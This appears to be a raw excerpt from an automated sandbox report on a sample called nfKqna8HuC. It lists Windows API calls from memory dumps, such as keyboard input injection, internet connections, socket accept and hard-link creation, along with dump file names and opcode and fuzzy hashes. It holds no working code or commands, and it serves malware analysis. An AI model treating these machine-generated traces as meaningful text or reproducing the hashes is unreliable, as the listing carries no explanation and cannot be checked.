                                                                    • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0068C5DA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ClientMoveRectScreen
                                                                    • String ID:
                                                                    • API String ID: 3880355969-0
                                                                    • Opcode ID: 9d58792fc932b8d157a2e99b4f47ab38273ebc1e36d13b33b0a1fcd33b549d5a
                                                                    • Instruction ID: cfc2975f7b6dc453bb7218d71e1196a22d41a50809940c26c5d0145c3106d0a3
                                                                    • Opcode Fuzzy Hash: 9d58792fc932b8d157a2e99b4f47ab38273ebc1e36d13b33b0a1fcd33b549d5a
                                                                    • Instruction Fuzzy Hash: 0B512C75900205EFCF20EF68C880AAE7BB7EB55320F109669F9559B291D770ED91CBA0
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0065C462
                                                                    • __itow.LIBCMT ref: 0065C49C
                                                                      • Part of subcall function 0065C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0065C753
                                                                    • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0065C505
                                                                    • __itow.LIBCMT ref: 0065C55A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$__itow
                                                                    • String ID:
                                                                    • API String ID: 3379773720-0
                                                                    • Opcode ID: b35b678ec294a5b3c1f31013629437b9cf8209217026fd812d455ac575dced9e
                                                                    • Instruction ID: eaa38b83d11b9355b776d94755fe78e7915199920bffb434df8906c32e307746
                                                                    • Opcode Fuzzy Hash: b35b678ec294a5b3c1f31013629437b9cf8209217026fd812d455ac575dced9e
                                                                    • Instruction Fuzzy Hash: 5741E170A00718AFDF20EF54D855FEE7BBAAF49721F000019F906A7281DB709A598FA5
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00663966
                                                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 00663982
                                                                    • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 006639EF
                                                                    • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00663A4D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                    • String ID:
                                                                    • API String ID: 432972143-0
                                                                    • Opcode ID: 62a9faabb35aa5ef2a80b710101c54b09a7c3079856e90cf181dd5157a50a886
                                                                    • Instruction ID: 55f56a7b2550e7e6f3273d531d44b8e134ef3a29136e8a261b1394acd78cb959
                                                                    • Opcode Fuzzy Hash: 62a9faabb35aa5ef2a80b710101c54b09a7c3079856e90cf181dd5157a50a886
                                                                    • Instruction Fuzzy Hash: D7410770E04668AAEF208B648815BFDBBB7AF55310F04025AF4C2963C1DBB49E85DF65
                                                                    APIs
                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0066E742
                                                                    • GetLastError.KERNEL32(?,00000000), ref: 0066E768
                                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0066E78D
                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0066E7B9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                    • String ID:
                                                                    • API String ID: 3321077145-0
                                                                    • Opcode ID: d4d648443ae3e5d61e796db9b70e9e1cc9f8c303919eed8663e4a4b3d845956b
                                                                    • Instruction ID: 388e50078801809bc1bf820f7be845b382e580bcac7833804d4d28272d06652a
                                                                    • Opcode Fuzzy Hash: d4d648443ae3e5d61e796db9b70e9e1cc9f8c303919eed8663e4a4b3d845956b
                                                                    • Instruction Fuzzy Hash: 29410339600A11DFCF11EF15C444A4DBBE6AF99710F198498E946AB3A2CB31FD01CF99
                                                                    APIs
                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0068B5D1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: InvalidateRect
                                                                    • String ID:
                                                                    • API String ID: 634782764-0
                                                                    • Opcode ID: 47b92b870a6dc1fcb66cba10ba836e647e68fd679df5bd75f95262dbfb98ee6e
                                                                    • Instruction ID: 40730779a1c8dbeaeea15c7ca6e487358f560350a4de9a5d245ec46b15520666
                                                                    • Opcode Fuzzy Hash: 47b92b870a6dc1fcb66cba10ba836e647e68fd679df5bd75f95262dbfb98ee6e
                                                                    • Instruction Fuzzy Hash: 2A31BE74601204BFEF30BF18CC85FE87B67AB06310F546311FA52D62E2E770A9819B56
                                                                    APIs
                                                                    • ClientToScreen.USER32(?,?), ref: 0068D807
                                                                    • GetWindowRect.USER32(?,?), ref: 0068D87D
                                                                    • PtInRect.USER32(?,?,0068ED5A), ref: 0068D88D
                                                                    • MessageBeep.USER32(00000000), ref: 0068D8FE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                    • String ID:
                                                                    • API String ID: 1352109105-0
                                                                    • Opcode ID: 76cf6ec832c1029be29035756283361203ea9d725def1ac4a0c6fb5d53471afd
                                                                    • Instruction ID: 7dd71c397b5e0132559606b189f6a95e1f7b6dda54d78c5e8e4a4aae875c0b82
                                                                    • Opcode Fuzzy Hash: 76cf6ec832c1029be29035756283361203ea9d725def1ac4a0c6fb5d53471afd
                                                                    • Instruction Fuzzy Hash: 48416DB4A00259DFCB11EF58D884BA97BF7FB4A350F1882A9E4159F290D730E945CB60
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00663AB8
                                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00663AD4
                                                                    • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00663B34
                                                                    • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00663B92
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                    • String ID:
                                                                    • API String ID: 432972143-0
                                                                    • Opcode ID: f58ced88dc15c185b67cf9aa008dfedf53d63a59754933bcdff984a0e8ea875d
                                                                    • Instruction ID: 77c71ce2c1c1b7bc148d7657ce503f6433782eed44d425384d4c6be19b9da928
                                                                    • Opcode Fuzzy Hash: f58ced88dc15c185b67cf9aa008dfedf53d63a59754933bcdff984a0e8ea875d
                                                                    • Instruction Fuzzy Hash: 1331F470E00268AEFF219B64C819BFE7BAB9B66310F04015AE482933D1C7759F45D7A5
                                                                    APIs
                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00654038
                                                                    • __isleadbyte_l.LIBCMT ref: 00654066
                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00654094
                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 006540CA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                    • String ID:
                                                                    • API String ID: 3058430110-0
                                                                    • Opcode ID: becf3a8a874e47a5b9092aa7e780b36e5695ee6a66ae509eb4864f9d67d77837
                                                                    • Instruction ID: c2ede3e8b9bb54f85f4af15d21b02e59636fe801a9cd32267c38639993315ef9
                                                                    • Opcode Fuzzy Hash: becf3a8a874e47a5b9092aa7e780b36e5695ee6a66ae509eb4864f9d67d77837
                                                                    • Instruction Fuzzy Hash: 6B31C330504206AFDB219F75C844BAA7BA7FF41316F2540A8EA518B2D0DB31D8D5DB90
                                                                    APIs
                                                                    • GetForegroundWindow.USER32 ref: 00687CB9
                                                                      • Part of subcall function 00665F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00665F6F
                                                                      • Part of subcall function 00665F55: GetCurrentThreadId.KERNEL32 ref: 00665F76
                                                                      • Part of subcall function 00665F55: AttachThreadInput.USER32(00000000,?,0066781F), ref: 00665F7D
                                                                    • GetCaretPos.USER32(?), ref: 00687CCA
                                                                    • ClientToScreen.USER32(00000000,?), ref: 00687D03
                                                                    • GetForegroundWindow.USER32 ref: 00687D09
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                    • String ID:
                                                                    • API String ID: 2759813231-0
                                                                    • Opcode ID: 406631fe99d43797590720315a1411f5e1a8e2b5f9099d087c20006aaa5e7d2d
                                                                    • Instruction ID: b525a7a12dd9510797c1b81e292d8e7008206b80e4d7050743300475482bfbc9
                                                                    • Opcode Fuzzy Hash: 406631fe99d43797590720315a1411f5e1a8e2b5f9099d087c20006aaa5e7d2d
                                                                    • Instruction Fuzzy Hash: EB312F71900108AFDB40EFA5C8459EFBBFAEF58310F10946AF815E3211DA31AE058FA4
                                                                    APIs
                                                                      • Part of subcall function 0063B34E: GetWindowLongW.USER32(?,000000EB), ref: 0063B35F
                                                                    • GetCursorPos.USER32(?), ref: 0068F211
                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0069E4C0,?,?,?,?,?), ref: 0068F226
                                                                    • GetCursorPos.USER32(?), ref: 0068F270
                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0069E4C0,?,?,?), ref: 0068F2A6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                    • String ID:
                                                                    • API String ID: 2864067406-0
                                                                    • Opcode ID: f55ec48a05491f038c648121e0b4bae257c1327966e52ff3fbcef1bfb81189e0
                                                                    • Instruction ID: bbefbb6b309c2694a3ea4110f6a54738e97c06a89aaa92a3e7c984a6a57d6829
                                                                    • Opcode Fuzzy Hash: f55ec48a05491f038c648121e0b4bae257c1327966e52ff3fbcef1bfb81189e0
                                                                    • Instruction Fuzzy Hash: 04219139601118AFCB15AF94C868EEEBBB7EF0A710F044169F9054B2A1D7319E51DBA0
                                                                    APIs
                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00674358
                                                                      • Part of subcall function 006743E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00674401
                                                                      • Part of subcall function 006743E2: InternetCloseHandle.WININET(00000000), ref: 0067449E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$CloseConnectHandleOpen
                                                                    • String ID:
                                                                    • API String ID: 1463438336-0
                                                                    • Opcode ID: 3a28ee50eb8683d87c9ae35f6664af4ae4d2b8aa5057e1663932d09681fe67a5
                                                                    • Instruction ID: a94f2f1710713b55fb63feb49e37086548729ac295e661d9987c870bf9e2b1ba
                                                                    • Opcode Fuzzy Hash: 3a28ee50eb8683d87c9ae35f6664af4ae4d2b8aa5057e1663932d09681fe67a5
                                                                    • Instruction Fuzzy Hash: A221D131200601BBEB159F619C04FBBB7ABFF44720F10811EBA1E96690DF71E8219B90
                                                                    APIs
                                                                    • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00678AE0
                                                                    • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00678AF2
                                                                    • accept.WSOCK32(00000000,00000000,00000000), ref: 00678AFF
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00678B16
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastacceptselect
                                                                    • String ID:
                                                                    • API String ID: 385091864-0
                                                                    • Opcode ID: 7f2b06b210ee1204935d9f64878ff1202238fbac499d0396e8b6520ea9e54ef9
                                                                    • Instruction ID: 715254feb141ceb680af10da7a31cb6a90b38ddfce07a76afba3010455c23712
                                                                    • Opcode Fuzzy Hash: 7f2b06b210ee1204935d9f64878ff1202238fbac499d0396e8b6520ea9e54ef9
                                                                    • Instruction Fuzzy Hash: 6B21C372A001249FC7549F68C884ADEBBEDEF4A710F00816AF84AD7291DB74EE418F90
                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00688AA6
                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00688AC0
                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00688ACE
                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00688ADC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Long$AttributesLayered
                                                                    • String ID:
                                                                    • API String ID: 2169480361-0
                                                                    • Opcode ID: 457912e879c37996e5301972598a13f1956d2ec36fd1da2fd22d435b50609f08
                                                                    • Instruction ID: 02b8071ff31cd37fd5aabc56ac65041653bc2bcc9fe2d6e798c08ec397d4345d
                                                                    • Opcode Fuzzy Hash: 457912e879c37996e5301972598a13f1956d2ec36fd1da2fd22d435b50609f08
                                                                    • Instruction Fuzzy Hash: 95118E31245521AFDB58BB18DC15FBA779BEF8A320F144219F916C72E2CB74BD018B94
                                                                    APIs
                                                                      • Part of subcall function 00661E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00660ABB,?,?,?,0066187A,00000000,000000EF,00000119,?,?), ref: 00661E77
                                                                      • Part of subcall function 00661E68: lstrcpyW.KERNEL32(00000000,?,?,00660ABB,?,?,?,0066187A,00000000,000000EF,00000119,?,?,00000000), ref: 00661E9D
                                                                      • Part of subcall function 00661E68: lstrcmpiW.KERNEL32(00000000,?,00660ABB,?,?,?,0066187A,00000000,000000EF,00000119,?,?), ref: 00661ECE
                                                                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0066187A,00000000,000000EF,00000119,?,?,00000000), ref: 00660AD4
                                                                    • lstrcpyW.KERNEL32(00000000,?,?,0066187A,00000000,000000EF,00000119,?,?,00000000), ref: 00660AFA
                                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,0066187A,00000000,000000EF,00000119,?,?,00000000), ref: 00660B2E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcmpilstrcpylstrlen
                                                                    • String ID: cdecl
                                                                    • API String ID: 4031866154-3896280584
                                                                    • Opcode ID: 894ab5acf8cfbb0b1eccd93507571623ba5cbf607f42ee771715f0270c62b2b7
                                                                    • Instruction ID: 6fd78201d884b35cf37ba7d3629546d063cb431a64dd29f8587cf3ea7f08fcc4
                                                                    • Opcode Fuzzy Hash: 894ab5acf8cfbb0b1eccd93507571623ba5cbf607f42ee771715f0270c62b2b7
                                                                    • Instruction Fuzzy Hash: B511963A200305AFDB25AF24DC45D7A77AAFF56354F80807AE906CB250EB72D851D7E4
                                                                    APIs
                                                                    • _free.LIBCMT ref: 00652FB5
                                                                      • Part of subcall function 0064395C: __FF_MSGBANNER.LIBCMT ref: 00643973
                                                                      • Part of subcall function 0064395C: __NMSG_WRITE.LIBCMT ref: 0064397A
                                                                      • Part of subcall function 0064395C: RtlAllocateHeap.NTDLL(01260000,00000000,00000001,00000001,00000000,?,?,0063F507,?,0000000E), ref: 0064399F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap_free
                                                                    • String ID:
                                                                    • API String ID: 614378929-0
                                                                    • Opcode ID: d30d671c6b8cd2c54868e0685abd0f4e71eba7f0e6c398d4a6feeeea80c62b67
                                                                    • Instruction ID: d3976f804f20670408c19d6e9f4b2ca6b0efc73255842ebfa5a9bdf4c6271949
                                                                    • Opcode Fuzzy Hash: d30d671c6b8cd2c54868e0685abd0f4e71eba7f0e6c398d4a6feeeea80c62b67
                                                                    • Instruction Fuzzy Hash: FF110D31548322EFDF313FB0AC546A93B97AF067A1F204419FC499A391DB34C9458B94
                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 006605AC
                                                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 006605C7
                                                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 006605DD
                                                                    • FreeLibrary.KERNEL32(?), ref: 00660632
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                    • String ID:
                                                                    • API String ID: 3137044355-0
                                                                    • Opcode ID: ccc0b6b900fcfecd825fe674d0a0a037631ead69ce6b57b37521a1d9ccc7d190
                                                                    • Instruction ID: 86f3d6e29d84d702ec2389e593171ea2fddada36382e6baec5aa6e85271d7130
                                                                    • Opcode Fuzzy Hash: ccc0b6b900fcfecd825fe674d0a0a037631ead69ce6b57b37521a1d9ccc7d190
                                                                    • Instruction Fuzzy Hash: B0216771900209FBEB209F91DC98ADBBBBAEF80700F00847AE516D6150DBB0EA55DF60
                                                                    APIs
